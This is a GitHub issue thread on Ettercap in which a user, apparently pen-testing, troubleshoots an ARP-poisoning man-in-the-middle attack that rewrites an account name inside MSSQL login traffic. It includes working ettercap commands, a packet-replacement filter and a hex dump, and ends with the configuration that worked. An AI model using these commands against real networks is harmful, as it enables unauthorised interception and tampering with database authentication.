### ISSUE TITLE
Injection doest appear to be working

### ISSUE THREAD

**Issue by graythang** [Ettercap/ettercap#1079]
Not certain what I might be doing wrong but would appreciate it you'd take a quick look.  Attempting to modify SQL statements sent between a fat client and the SQL server.  In this test run I'm simply attempting to replace the account ID 'g.t.p.e.n.t.e.s.t' with 'M.I.C.K.E.Y.M.O.U.S.E'  While I receive the msgs defined in the filter log "Found our string!" "...and replaced it :)", the packet captures don't show any change occurring.  Note: ettercap is running on a VP (kali-rolling), and the wireshark capture is running on the machine hosting the VM (MacBook Pro), and is capturing the same packets as shown in the ettercap log files. 

Any help or suggestions appreciated.   

Starting ettercap with: 
           ettercap -T -L -q -F ./my.filter.ef -M ARP //10.125.87.231// //10.211.55.4//

Contents of my.filter.ef:
```
if (ip.proto == TCP && tcp.dst == 1433) {
       msg("SQL traffic discovered");
       if (search(DATA.data,"\x67\x00\x74\x00\x70\x00\x65\x00\x6e\x00\x74\x00\x65\x00\x73\x00\x74\x00\x31\x00")) {
              msg("Found our string!");
              replace("\x67\x00\x74\x00\x70\x00\x65\x00\x6e\x00\x74\x00\x65\x00\x73\x00\x74\x00\x31\x00","\x4d\x00\x49\x00\x43\x00\x4b\x00\x59\x00\x4d\x00\x4f\x00\x55\x00\x53\x00\x45\x00");
              msg("...and replaced it :)");
       }
}
```

ettercap view output

SQL traffic discovered
Found our string!
...and replaced it :)
```
Sun Oct 18 01:56:16 2020 [464142]
TCP  10.211.55.4:49502 --> 10.125.87.231:1433 | AP (316)
0000: 0301 013c 0000 0100 1600 0000 1200 0000  ...<............
0010: 0200 0000 0000 0000 0000 0100 0000 ffff  ................
0020: 0a00 0200 0000 e79c 0009 04d0 0034 9c00  .............4..
0030: 5300 4500 4c00 4500 4300 5400 2000 5400  S.E.L.E.C.T. .T.
0040: 4f00 5000 2000 3100 2000 2000 2a00 2000  O.P. .1. . .*. .
0050: 4600 5200 4f00 4d00 2000 5400 4d00 5f00  F.R.O.M. .X.X._.
0060: 4100 7500 7400 6800 5500 7300 6500 7200  A.u.t.h.U.s.e.r.
0070: 4c00 6f00 6700 6900 6e00 2000 5700 4800  L.o.g.i.n. .W.H.
0080: 4500 5200 4500 2000 5500 5000 5000 4500  E.R.E. .U.P.P.E.
0090: 5200 2800 4c00 6f00 6700 6900 6e00 4e00  R.(.L.o.g.i.n.N.
00a0: 6100 6d00 6500 2900 3d00 5500 5000 5000  a.m.e.).=.U.P.P.
00b0: 4500 5200 2800 4000 4c00 6f00 6700 6900  E.R.(.@.L.o.g.i.
00c0: 6e00 4e00 6100 6d00 6500 2900 0000 e730  n.N.a.m.e.)....0
00d0: 0009 04d0 0034 3000 4000 4c00 6f00 6700  .....40.@.L.o.g.
00e0: 6900 6e00 4e00 6100 6d00 6500 2000 6e00  i.n.N.a.m.e. .n.
00f0: 7600 6100 7200 6300 6800 6100 7200 2800  v.a.r.c.h.a.r.(.
0100: 3100 3000 3000 2900 0a40 004c 006f 0067  1.0.0.)..@.L.o.g
0110: 0069 006e 004e 0061 006d 0065 0000 e7c8  .i.n.N.a.m.e....
0120: 0009 04d0 0034 1400 6700 7400 7000 6500  .....4..g.t.p.e.
0130: 6e00 7400 6500 7300 7400 3100            n.t.e.s.t.1.
```

**Comment by LocutusOfBorg** [comment]
Hello, please share some information about the server and the client.
Which ip address has the server, which ip address has the client, how they are connected.

**Comment by koeppea** [comment]
So from the packet capture output, 10.211.55.4 is the database client and 10.125.87.231 is the database server.
Assuming ettercap runs in the client network, I would guess, the database server is outside the same subnet / broadcast domain.

The call of ettercap has specified the following targets: TARGET1: 10.125.87.231 and TARGET2: 10.211.55.4
But this target specification is wrong given the assumption, that both endpoints are located in two different subnets.

In this case you have to specify for TARGET1 the IP of the router of this subnet instead of the database server itself, because the ARP cache of the router and the database client have to be poisened.

This is given the assumption, that ettercap runs in the same subnet as the database client is located.
Since you've only provided the ettercap output of the filter, and not the whole content of the messages pane, I have to make these assumptions.

**Comment by graythang** [comment]
Yes sir you're correct this run was not targeting of the router and I should have mentioned that I tried that as well.  However, I'll run it again with the router and client specified.  If it still fails I'll forward the results to you - if there are any settings or specific traffic that will assist in running this to ground let me know and I'll be happy to provide that as well, I appreciate you taking the time to take a look at this.  
My reasoning for going with the DB IP in this run was my uncertainty...the  man page indicated the "targets are intended to filter traffic coming from one to the other..."  and wasn't certain whether ettercap was looking for the actual DB IP for the MITM or not.  As I saw packets in ettercap logs going it both directions both when the router was targeted and when the db ip was targeted couldn't for sure which Ettercap’s MITM needed.

**Comment by graythang** [comment]
OK. Re-ran using the VM network gateway (10.211.55.1), and client (10.211.55.4).  While a check of the arp table on the client verifies its been changed to the mac of the ettercap host the only traffic reported by ettercap log is the clients DNS trafiic related to the sqldb.  No SQL traffic detected.. Same.  
Test using the VM hosts default gateway (192.168.1.1) and the client (10.211.55.4), the apr table on the client remains unchanged and the ettercap logs report no traffic at all.

As I previously reported using the SQLDB ip.addr and the clients ip.addr the arp table on the client is changed, and ettercap reports sql string was detected and replaced but neither ettercap or the wireshark logs have any packet to confirm the replacement.  

Was REALLY hoping my mistake of not using the VM network gateway was the cause but no joy.  
Any other ideas of what I could try?

**Comment by graythang** [comment]
UPDATE.   I went back and tried running leaving the server IP set to the whole subnet:
E.G. sudo ettercap -T -L -q -F ./mssql.filter.ef -M ARP //// //10.211.55.4//

And that did the trick.  The replacement is now present in the ettercap logs and the wireshark capture.  Thanks for your help...Sometimes just talking it through with someone else is all that's needed.  I appreciate your efforts and help :) 
Keep up the good work!

**Comment by LocutusOfBorg** [comment]
nice you solved it!
